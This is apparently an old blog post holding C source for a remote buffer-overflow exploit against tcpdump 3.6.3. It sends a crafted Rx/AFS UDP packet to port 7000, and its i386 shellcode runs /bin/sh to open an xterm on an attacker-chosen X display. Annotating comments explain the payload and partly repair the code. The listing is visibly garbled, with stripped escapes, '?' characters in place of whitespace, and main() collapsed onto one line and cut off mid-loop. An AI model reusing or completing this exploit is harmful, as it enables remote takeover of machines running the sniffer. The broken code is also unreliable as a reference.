
tcpdump remote exploit (old)

Posted by deepquest on March 2, 2004 – 4:57 pm

Old remote exploit against tcpdump 3.6.3 (the banner in main() names FreeBSD 4.6 as the target). It sends a single crafted Rx/AFS UDP datagram to port 7000, presumably to overflow tcpdump's Rx packet printer while it is sniffing that traffic. Note that the listing below is render-damaged: the backslashes of the string escapes were stripped, whitespace became "?" characters, most of main() has been collapsed onto one line, and the end of main() is truncated, so the code as shown does not compile as-is.

feed the goats!

#include
??#include
??#include
??#include
??#include
??#include

/*
 * Overflow parameters.
 *
 * ADDR is a fixed absolute stack address for the tcpdump 3.6.3 / FreeBSD 4.6
 * build named in main()'s banner; main() adds the optional third argv
 * value (OFFSET by default) to it before use.  NOTE(review): being an
 * absolute address, it is only meaningful for that exact binary and stack
 * layout.  NUM_ADDR and NUM_NOP are presumably the number of return-address
 * copies and the NOP-sled length -- the loop that uses them lies past the
 * visible end of main(), so confirm against the full listing.
 */
#define ADDR                  0xbffff248
#define OFFSET                0
#define NUM_ADDR              10
#define NOP                   0x90   /* i386 single-byte NOP */
#define NUM_NOP               100

/*
 * Rx (AFS RPC transport) constants: main() marks the packet as a
 * client-initiated DATA packet, sends it from UDP 7001 to UDP 7000, and
 * writes AFS_CALL as the first 32-bit word of the payload (presumably the
 * AFS RPC opcode).
 */
#define RX_CLIENT_INITIATED   1
#define RX_PACKET_TYPE_DATA   1
#define FS_RX_DPORT           7000
#define FS_RX_SPORT           7001
#define AFS_CALL              134

/*
 * On-the-wire Rx packet header, laid out exactly as it is sent: five 32-bit
 * words, four single bytes, then two 16-bit fields -- 28 bytes with no
 * padding on the usual i386/amd64 ABIs.  main() overlays this on the start
 * of its send buffer and fills in type, flags and seq (seq via htonl());
 * every other field is left zero.  Do not reorder or retype the members.
 */
struct rx_header {
    u_int32_t epoch, cid, callNumber, seq, serial;
    u_char    type, flags, userStatus, securityIndex;
    u_short   spare, serviceId;
};

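/*
 * i386 payload placed in the overflow.
 *
 * Reconstruction note: the page rendering stripped every backslash and turned
 * the quotes typographic, leaving text like "xebx57x5e"; the \x escapes and
 * ASCII quotes below are restored from that text, nothing else was changed.
 *
 * What the bytes show:
 *  - eb 57 ... e8 a4 ff ff ff / 5e : jmp-call-pop, so esi ends up pointing at
 *    the trailing command string (94 bytes in);
 *  - mov bl,0x21; dec bl; mov [esi+0x2c/0x23/0x1f],bl then xor ebx,ebx;
 *    mov [esi+7],bl; mov [esi+10],bl : rewrites the 'Z' separator
 *    placeholders in the string at run time (space or NUL), turning it into
 *    "/bin/sh" NUL "-c" NUL "/usr/X11R6/bin/xterm -ut -display ...";
 *  - the lea/mov stores through esi-0x10..esi-4 build the argv array in
 *    place, over the 0xAA..0xDD filler and the already-executed call bytes;
 *  - xor eax,eax; mov al,0x0e; dec eax x3; int 0x80 with ebx/ecx/edx loaded,
 *    then eax=1; int 0x80.
 *
 * NOTE(review): that register-argument int 0x80 sequence (eax=11, then
 * eax=1) looks like the Linux i386 syscall convention; FreeBSD passes syscall
 * arguments on the stack, so the payload does not obviously match the
 * "FreeBSD 4.6" target in main()'s banner -- confirm before relying on it.
 * The display name from argv[2] is presumably appended after the final 'Z';
 * the code that would do so lies past the visible end of main().
 */
char shellcode[] =
    "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
    "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
    "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
    "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
    "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
    "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
    "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
    "\xff\xff\xff"
    "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";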

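/*
 * Turn a dotted-quad string or a host name into an IPv4 address in network
 * byte order, as main() stores it into sockaddr_in.sin_addr.s_addr.
 *
 * name:    dotted-quad ("10.0.0.1") or DNS name.
 * returns: the address in network byte order, widened to long.  Does not
 *          return on failure: prints a diagnostic and exit(-1)s, as before.
 *
 * Fixes: the original held inet_addr()'s unsigned 32-bit result in a `long`
 * and compared it with -1, which on LP64 never matches (0xffffffffL != -1L),
 * so host names were never looked up and 255.255.255.255 was sent to
 * instead; it also memcpy'd 4 bytes out of h_addr without checking the
 * address family or length.  The message string had lost its "\n" and its
 * apostrophe to the page rendering; both are restored.
 */
long resolve(char *name) {
    in_addr_t ip = inet_addr(name);

    /* INADDR_NONE also means a literal 255.255.255.255 falls through to the
     * name lookup -- same limitation as the original. */
    if (ip == INADDR_NONE) {
        struct hostent *hp = gethostbyname(name);

        if (hp == NULL || hp->h_addrtype != AF_INET ||
            hp->h_length != (int)sizeof(ip) || hp->h_addr_list[0] == NULL) {
            fprintf(stderr, "Can't resolve host name [%s].\n", name);
            exit(-1);
        }
        memcpy(&ip, hp->h_addr_list[0], sizeof(ip));
    }
    return (long)ip;
}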

??int main (int argc, char *argv[]) {

?? struct sockaddr_in addr,sin;
?? int sock,aux, offset=OFFSET;
?? char buffer[4048], *chptr;
?? struct rx_header *rxh;
?? long int *lptr, return_addr=ADDR;

???fprintf(stderr,”Tcpdump 3.6.3 remote exploit against FreeBSD 4.6nn”);

???if (argc<3) { ????printf("Usage: %s [host] [display] [offset]n",argv[0]); ????exit(-1); ????} ???if (argc==4) offset=atoi(argv[3]); ???return_addr+=offset; ???fprintf(stderr,"Using return addr: %#xn",return_addr); ???addr.sin_family=AF_INET; ???addr.sin_addr.s_addr=resolve(argv[1]); ???addr.sin_port=htons(FS_RX_DPORT); ???if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) { ???? perror("socket()"); ???? exit(-1); ???? } ???sin.sin_family=AF_INET; ???sin.sin_addr.s_addr=INADDR_ANY; ???sin.sin_port=htons(FS_RX_SPORT); ???if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) { ?????perror("bind()"); ?????exit(-1); ?????} ???memset(buffer,0,sizeof(buffer)); ???rxh=(struct rx_header *)buffer; ???rxh->type=RX_PACKET_TYPE_DATA;
???rxh->seq=htonl(1);
???rxh->flags=RX_CLIENT_INITIATED;

???lptr=(long int *)(buffer+sizeof(struct rx_header));
???*(lptr++)=htonl(AFS_CALL);
???*(lptr++)=htonl(1);
???*(lptr++)=htonl(2);
???*(lptr++)=htonl(3);

???*(lptr++)=htonl(420);
???chptr=(char *)lptr;
???sprintf(chptr,”1 0n”);
???chptr+=4;

???memset(chptr,’A’,120);
???chptr+=120;
???lptr=(long int *)chptr;
???for (aux=0;aux

